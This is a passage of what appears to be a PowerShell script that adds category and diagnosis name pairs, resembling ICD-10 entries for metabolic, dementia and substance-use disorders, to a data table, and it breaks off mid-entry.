$DiagnosisList.Rows.Add("Sphingolipidosis, unspecified","Sphingolipidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Neuronal ceroid lipofuscinosis","Neuronal ceroid lipofuscinosis") + $null = $DiagnosisList.Rows.Add("Other lipid storage disorders","Other lipid storage disorders") + $null = $DiagnosisList.Rows.Add("Lipid storage disorder, unspecified","Lipid storage disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Mucopolysaccharidosis, type I","Hurler's syndrome") + $null = $DiagnosisList.Rows.Add("Mucopolysaccharidosis, type I","Hurler-Scheie syndrome") + $null = $DiagnosisList.Rows.Add("Mucopolysaccharidosis, type I","Scheie's syndrome") + $null = $DiagnosisList.Rows.Add("Mucopolysaccharidosis, type II","Mucopolysaccharidosis, type II") + $null = $DiagnosisList.Rows.Add("Morquio mucopolysaccharidoses","Morquio A mucopolysaccharidoses") + $null = $DiagnosisList.Rows.Add("Morquio mucopolysaccharidoses","Morquio B mucopolysaccharidoses") + $null = $DiagnosisList.Rows.Add("Morquio mucopolysaccharidoses","Morquio mucopolysaccharidoses, unspecified") + $null = $DiagnosisList.Rows.Add("Sanfilippo mucopolysaccharidoses","Sanfilippo mucopolysaccharidoses") + $null = $DiagnosisList.Rows.Add("Other mucopolysaccharidoses","Other mucopolysaccharidoses") + $null = $DiagnosisList.Rows.Add("Mucopolysaccharidosis, unspecified","Mucopolysaccharidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of glucosaminoglycan metabolism","Other disorders of glucosaminoglycan metabolism") + $null = $DiagnosisList.Rows.Add("Glucosaminoglycan metabolism disorder, unspecified","Glucosaminoglycan metabolism disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of glycoprotein metabolism","Defects in post-translational modification of lysosomal enzymes") + $null = $DiagnosisList.Rows.Add("Disorders of glycoprotein metabolism","Defects in glycoprotein degradation") + $null = $DiagnosisList.Rows.Add("Disorders of glycoprotein metabolism","Other disorders of glycoprotein metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of glycoprotein metabolism","Disorder of glycoprotein metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Pure hypercholesterolemia","Pure hypercholesterolemia, unspecified") + $null = $DiagnosisList.Rows.Add("Pure hypercholesterolemia","Familial hypercholesterolemia") + $null = $DiagnosisList.Rows.Add("Pure hyperglyceridemia","Pure hyperglyceridemia") + $null = $DiagnosisList.Rows.Add("Mixed hyperlipidemia","Mixed hyperlipidemia") + $null = $DiagnosisList.Rows.Add("Hyperchylomicronemia","Hyperchylomicronemia") + $null = $DiagnosisList.Rows.Add("Other hyperlipidemia","Other hyperlipidemia") + $null = $DiagnosisList.Rows.Add("Hyperlipidemia, unspecified","Hyperlipidemia, unspecified") + $null = $DiagnosisList.Rows.Add("Lipoprotein deficiency","Lipoprotein deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of bile acid and cholesterol metabolism","Disorder of bile acid and cholesterol metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of bile acid and cholesterol metabolism","Barth syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of bile acid and cholesterol metabolism","Smith-Lemli-Opitz syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of bile acid and cholesterol metabolism","Other disorders of bile acid and cholesterol metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of lipoprotein metabolism","Lipoid dermatoarthritis") + $null = $DiagnosisList.Rows.Add("Other disorders of lipoprotein metabolism","Other lipoprotein metabolism disorders") + $null = $DiagnosisList.Rows.Add("Disorder of lipoprotein metabolism, unspecified","Disorder of lipoprotein metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of purine and pyrimidine metabolism","Hyperuricemia without signs of inflammatory arthritis and tophaceous disease") + $null = $DiagnosisList.Rows.Add("Disorders of purine and pyrimidine metabolism","Lesch-Nyhan syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of purine and pyrimidine metabolism","Myoadenylate deaminase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of purine and pyrimidine metabolism","Other disorders of purine and pyrimidine metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of purine and pyrimidine metabolism","Disorder of purine and pyrimidine metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of porphyrin and bilirubin metabolism","Hereditary erythropoietic porphyria") + $null = $DiagnosisList.Rows.Add("Disorders of porphyrin and bilirubin metabolism","Porphyria cutanea tarda") + $null = $DiagnosisList.Rows.Add("Other and unspecified porphyria","Unspecified porphyria") + $null = $DiagnosisList.Rows.Add("Other and unspecified porphyria","Acute intermittent (hepatic) porphyria") + $null = $DiagnosisList.Rows.Add("Other and unspecified porphyria","Other porphyria") + $null = $DiagnosisList.Rows.Add("Defects of catalase and peroxidase","Defects of catalase and peroxidase") + $null = $DiagnosisList.Rows.Add("Gilbert syndrome","Gilbert syndrome") + $null = $DiagnosisList.Rows.Add("Crigler-Najjar syndrome","Crigler-Najjar syndrome") + $null = $DiagnosisList.Rows.Add("Other disorders of bilirubin metabolism","Other disorders of bilirubin metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of bilirubin metabolism, unspecified","Disorder of bilirubin metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of copper metabolism","Disorder of copper metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of copper metabolism","Wilson's disease") + $null = $DiagnosisList.Rows.Add("Disorders of copper metabolism","Other disorders of copper metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of iron metabolism","Disorder of iron metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Hemochromatosis","Hereditary hemochromatosis") + $null = $DiagnosisList.Rows.Add("Hemochromatosis","Hemochromatosis due to repeated red blood cell transfusions") + $null = $DiagnosisList.Rows.Add("Hemochromatosis","Other hemochromatosis") + $null = $DiagnosisList.Rows.Add("Hemochromatosis","Hemochromatosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of iron metabolism","Other disorders of iron metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of zinc metabolism","Disorders of zinc metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of phosphorus metabolism and phosphatases","Disorder of phosphorus metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of phosphorus metabolism and phosphatases","Familial hypophosphatemia") + $null = $DiagnosisList.Rows.Add("Disorders of phosphorus metabolism and phosphatases","Hereditary vitamin D-dependent rickets (type 1) (type 2)") + $null = $DiagnosisList.Rows.Add("Disorders of phosphorus metabolism and phosphatases","Other disorders of phosphorus metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of magnesium metabolism","Disorders of magnesium metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of magnesium metabolism","Hypermagnesemia") + $null = $DiagnosisList.Rows.Add("Disorders of magnesium metabolism","Hypomagnesemia") + $null = $DiagnosisList.Rows.Add("Disorders of magnesium metabolism","Other disorders of magnesium metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of calcium metabolism","Unspecified disorder of calcium metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of calcium metabolism","Hypocalcemia") + $null = $DiagnosisList.Rows.Add("Disorders of calcium metabolism","Hypercalcemia") + $null = $DiagnosisList.Rows.Add("Disorders of calcium metabolism","Other disorders of calcium metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of mineral metabolism","Hungry bone syndrome") + $null = $DiagnosisList.Rows.Add("Other disorders of mineral metabolism","Other disorders of mineral metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of mineral metabolism, unspecified","Disorder of mineral metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis","Cystic fibrosis with pulmonary manifestations") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis with intestinal manifestations","Meconium ileus in cystic fibrosis") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis with intestinal manifestations","Cystic fibrosis with other intestinal manifestations") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis with other manifestations","Cystic fibrosis with other manifestations") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis, unspecified","Cystic fibrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Amyloidosis","Non-neuropathic heredofamilial amyloidosis") + $null = $DiagnosisList.Rows.Add("Amyloidosis","Neuropathic heredofamilial amyloidosis") + $null = $DiagnosisList.Rows.Add("Amyloidosis","Heredofamilial amyloidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Amyloidosis","Secondary systemic amyloidosis") + $null = $DiagnosisList.Rows.Add("Amyloidosis","Organ-limited amyloidosis") + $null = $DiagnosisList.Rows.Add("Other amyloidosis","Light chain (AL) amyloidosis") + $null = $DiagnosisList.Rows.Add("Other amyloidosis","Wild-type transthyretin-related (ATTR) amyloidosis") + $null = $DiagnosisList.Rows.Add("Other amyloidosis","Other amyloidosis") + $null = $DiagnosisList.Rows.Add("Amyloidosis, unspecified","Amyloidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Volume depletion","Dehydration") + $null = $DiagnosisList.Rows.Add("Volume depletion","Hypovolemia") + $null = $DiagnosisList.Rows.Add("Volume depletion","Volume depletion, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Hyperosmolality and hypernatremia") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Hypo-osmolality and hyponatremia") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Acidosis") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Alkalosis") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Mixed disorder of acid-base balance") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Hyperkalemia") + $null = $DiagnosisList.Rows.Add("Other disorders of fluid, electrolyte and acid-base balance","Hypokalemia") + $null = $DiagnosisList.Rows.Add("Fluid overload","Fluid overload, unspecified") + $null = $DiagnosisList.Rows.Add("Fluid overload","Transfusion associated circulatory overload") + $null = $DiagnosisList.Rows.Add("Fluid overload","Other fluid overload") + $null = $DiagnosisList.Rows.Add("Other disorders of electrolyte and fluid balance, not elsewhere classified","Other disorders of electrolyte and fluid balance, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Disorders of plasma-protein metabolism, not elsewhere classified","Alpha-1-antitrypsin deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of plasma-protein metabolism, not elsewhere classified","Other disorders of plasma-protein metabolism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Lipodystrophy, not elsewhere classified","Lipodystrophy, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Lipomatosis, not elsewhere classified","Lipomatosis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Tumor lysis syndrome","Tumor lysis syndrome") + $null = $DiagnosisList.Rows.Add("Mitochondrial metabolism disorders","Mitochondrial metabolism disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Mitochondrial metabolism disorders","MELAS syndrome") + $null = $DiagnosisList.Rows.Add("Mitochondrial metabolism disorders","MERRF syndrome") + $null = $DiagnosisList.Rows.Add("Mitochondrial metabolism disorders","Other mitochondrial metabolism disorders") + $null = $DiagnosisList.Rows.Add("Other specified metabolic disorders","Metabolic syndrome") + $null = $DiagnosisList.Rows.Add("Other specified metabolic disorders","Other specified metabolic disorders") + $null = $DiagnosisList.Rows.Add("Metabolic disorder, unspecified","Metabolic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Postprocedural endocrine and metabolic complications and disorders, not elsewhere classified","Postprocedural hypothyroidism") + $null = $DiagnosisList.Rows.Add("Postprocedural endocrine and metabolic complications and disorders, not elsewhere classified","Postprocedural hypoinsulinemia") + $null = $DiagnosisList.Rows.Add("Postprocedural endocrine and metabolic complications and disorders, not elsewhere classified","Postprocedural hypoparathyroidism") + $null = $DiagnosisList.Rows.Add("Postprocedural endocrine and metabolic complications and disorders, not elsewhere classified","Postprocedural hypopituitarism") + $null = $DiagnosisList.Rows.Add("Postprocedural ovarian failure","Asymptomatic postprocedural ovarian failure") + $null = $DiagnosisList.Rows.Add("Postprocedural ovarian failure","Symptomatic postprocedural ovarian failure") + $null = $DiagnosisList.Rows.Add("Postprocedural testicular hypofunction","Postprocedural testicular hypofunction") + $null = $DiagnosisList.Rows.Add("Postprocedural adrenocortical (-medullary) hypofunction","Postprocedural adrenocortical (-medullary) hypofunction") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of an endocrine system organ or structure following a procedure","Postprocedural hemorrhage of an endocrine system organ or structure following an endocrine system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of an endocrine system organ or structure following a procedure","Postprocedural hemorrhage of an endocrine system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of an endocrine system organ or structure","Postprocedural hematoma of an endocrine system organ or structure following an endocrine system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of an endocrine system organ or structure","Postprocedural hematoma of an endocrine system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of an endocrine system organ or structure","Postprocedural seroma of an endocrine system organ or structure following an endocrine system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of an endocrine system organ or structure","Postprocedural seroma of an endocrine system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other postprocedural endocrine and metabolic complications and disorders","Other postprocedural endocrine and metabolic complications and disorders") + $null = $DiagnosisList.Rows.Add("Vascular dementia","Vascular dementia without behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Vascular dementia","Vascular dementia with behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Dementia in other diseases classified elsewhere","Dementia in other diseases classified elsewhere without behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Dementia in other diseases classified elsewhere","Dementia in other diseases classified elsewhere with behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Unspecified dementia","Unspecified dementia without behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Unspecified dementia","Unspecified dementia with behavioral disturbance") + $null = $DiagnosisList.Rows.Add("Amnestic disorder due to known physiological condition","Amnestic disorder due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Delirium due to known physiological condition","Delirium due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Other mental disorders due to known physiological condition","Psychotic disorder with hallucinations due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Other mental disorders due to known physiological condition","Catatonic disorder due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Other mental disorders due to known physiological condition","Psychotic disorder with delusions due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Mood disorder due to known physiological condition","Mood disorder due to known physiological condition, unspecified") + $null = $DiagnosisList.Rows.Add("Mood disorder due to known physiological condition","Mood disorder due to known physiological condition with depressive features") + $null = $DiagnosisList.Rows.Add("Mood disorder due to known physiological condition","Mood disorder due to known physiological condition with major depressive-like episode") + $null = $DiagnosisList.Rows.Add("Mood disorder due to known physiological condition","Mood disorder due to known physiological condition with manic features") + $null = $DiagnosisList.Rows.Add("Mood disorder due to known physiological condition","Mood disorder due to known physiological condition with mixed features") + $null = $DiagnosisList.Rows.Add("Anxiety disorder due to known physiological condition","Anxiety disorder due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Other specified mental disorders due to known physiological condition","Other specified mental disorders due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Personality and behavioral disorders due to known physiological condition","Personality change due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Other personality and behavioral disorders due to known physiological condition","Postconcussional syndrome") + $null = $DiagnosisList.Rows.Add("Other personality and behavioral disorders due to known physiological condition","Other personality and behavioral disorders due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Unspecified personality and behavioral disorder due to known physiological condition","Unspecified personality and behavioral disorder due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Unspecified mental disorder due to known physiological condition","Unspecified mental disorder due to known physiological condition") + $null = $DiagnosisList.Rows.Add("Alcohol abuse","Alcohol abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol abuse","Alcohol abuse, in remission") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with intoxication","Alcohol abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with intoxication","Alcohol abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with intoxication","Alcohol abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with alcohol-induced mood disorder","Alcohol abuse with alcohol-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with alcohol-induced psychotic disorder","Alcohol abuse with alcohol-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with alcohol-induced psychotic disorder","Alcohol abuse with alcohol-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with alcohol-induced psychotic disorder","Alcohol abuse with alcohol-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with other alcohol-induced disorders","Alcohol abuse with alcohol-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with other alcohol-induced disorders","Alcohol abuse with alcohol-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with other alcohol-induced disorders","Alcohol abuse with alcohol-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with other alcohol-induced disorders","Alcohol abuse with other alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Alcohol abuse with unspecified alcohol-induced disorder","Alcohol abuse with unspecified alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence","Alcohol dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol dependence","Alcohol dependence, in remission") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with intoxication","Alcohol dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with intoxication","Alcohol dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with intoxication","Alcohol dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with withdrawal","Alcohol dependence with withdrawal, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with withdrawal","Alcohol dependence with withdrawal delirium") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with withdrawal","Alcohol dependence with withdrawal with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with withdrawal","Alcohol dependence with withdrawal, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced mood disorder","Alcohol dependence with alcohol-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced psychotic disorder","Alcohol dependence with alcohol-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced psychotic disorder","Alcohol dependence with alcohol-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced psychotic disorder","Alcohol dependence with alcohol-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced persisting amnestic disorder","Alcohol dependence with alcohol-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with alcohol-induced persisting dementia","Alcohol dependence with alcohol-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with other alcohol-induced disorders","Alcohol dependence with alcohol-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with other alcohol-induced disorders","Alcohol dependence with alcohol-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with other alcohol-induced disorders","Alcohol dependence with alcohol-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with other alcohol-induced disorders","Alcohol dependence with other alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Alcohol dependence with unspecified alcohol-induced disorder","Alcohol dependence with unspecified alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with intoxication","Alcohol use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with intoxication","Alcohol use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with intoxication","Alcohol use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced mood disorder","Alcohol use, unspecified with alcohol-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced psychotic disorder","Alcohol use, unspecified with alcohol-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced psychotic disorder","Alcohol use, unspecified with alcohol-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced psychotic disorder","Alcohol use, unspecified with alcohol-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced persisting amnestic disorder","Alcohol use, unspecified with alcohol-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with alcohol-induced persisting dementia","Alcohol use, unspecified with alcohol-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with other alcohol-induced disorders","Alcohol use, unspecified with alcohol-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with other alcohol-induced disorders","Alcohol use, unspecified with alcohol-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with other alcohol-induced disorders","Alcohol use, unspecified with alcohol-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with other alcohol-induced disorders","Alcohol use, unspecified with other alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Alcohol use, unspecified with unspecified alcohol-induced disorder","Alcohol use, unspecified with unspecified alcohol-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid abuse","Opioid abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid abuse","Opioid abuse, in remission") + $null = $DiagnosisList.Rows.Add("Opioid abuse with intoxication","Opioid abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid abuse with intoxication","Opioid abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Opioid abuse with intoxication","Opioid abuse with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Opioid abuse with intoxication","Opioid abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid abuse with opioid-induced mood disorder","Opioid abuse with opioid-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Opioid abuse with opioid-induced psychotic disorder","Opioid abuse with opioid-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Opioid abuse with opioid-induced psychotic disorder","Opioid abuse with opioid-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Opioid abuse with opioid-induced psychotic disorder","Opioid abuse with opioid-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid abuse with other opioid-induced disorder","Opioid abuse with opioid-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Opioid abuse with other opioid-induced disorder","Opioid abuse with opioid-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Opioid abuse with other opioid-induced disorder","Opioid abuse with other opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid abuse with unspecified opioid-induced disorder","Opioid abuse with unspecified opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid dependence","Opioid dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid dependence","Opioid dependence, in remission") + $null = $DiagnosisList.Rows.Add("Opioid dependence with intoxication","Opioid dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid dependence with intoxication","Opioid dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Opioid dependence with intoxication","Opioid dependence with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Opioid dependence with intoxication","Opioid dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid dependence with withdrawal","Opioid dependence with withdrawal") + $null = $DiagnosisList.Rows.Add("Opioid dependence with opioid-induced mood disorder","Opioid dependence with opioid-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Opioid dependence with opioid-induced psychotic disorder","Opioid dependence with opioid-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Opioid dependence with opioid-induced psychotic disorder","Opioid dependence with opioid-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Opioid dependence with opioid-induced psychotic disorder","Opioid dependence with opioid-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid dependence with other opioid-induced disorder","Opioid dependence with opioid-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Opioid dependence with other opioid-induced disorder","Opioid dependence with opioid-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Opioid dependence with other opioid-induced disorder","Opioid dependence with other opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid dependence with unspecified opioid-induced disorder","Opioid dependence with unspecified opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified","Opioid use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with intoxication","Opioid use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with intoxication","Opioid use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with intoxication","Opioid use, unspecified with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with intoxication","Opioid use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with withdrawal","Opioid use, unspecified with withdrawal") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with opioid-induced mood disorder","Opioid use, unspecified with opioid-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with opioid-induced psychotic disorder","Opioid use, unspecified with opioid-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with opioid-induced psychotic disorder","Opioid use, unspecified with opioid-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with opioid-induced psychotic disorder","Opioid use, unspecified with opioid-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with other specified opioid-induced disorder","Opioid use, unspecified with opioid-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with other specified opioid-induced disorder","Opioid use, unspecified with opioid-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with other specified opioid-induced disorder","Opioid use, unspecified with other opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Opioid use, unspecified with unspecified opioid-induced disorder","Opioid use, unspecified with unspecified opioid-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis abuse","Cannabis abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis abuse","Cannabis abuse, in remission") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with intoxication","Cannabis abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with intoxication","Cannabis abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with intoxication","Cannabis abuse with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with intoxication","Cannabis abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with psychotic disorder","Cannabis abuse with psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with psychotic disorder","Cannabis abuse with psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with psychotic disorder","Cannabis abuse with psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with other cannabis-induced disorder","Cannabis abuse with cannabis-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with other cannabis-induced disorder","Cannabis abuse with other cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis abuse with unspecified cannabis-induced disorder","Cannabis abuse with unspecified cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis dependence","Cannabis dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis dependence","Cannabis dependence, in remission") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with intoxication","Cannabis dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with intoxication","Cannabis dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with intoxication","Cannabis dependence with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with intoxication","Cannabis dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with psychotic disorder","Cannabis dependence with psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with psychotic disorder","Cannabis dependence with psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with psychotic disorder","Cannabis dependence with psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with other cannabis-induced disorder","Cannabis dependence with cannabis-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cannabis dependence with other cannabis-induced disorder","Cannabis dependence with other cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis dependence 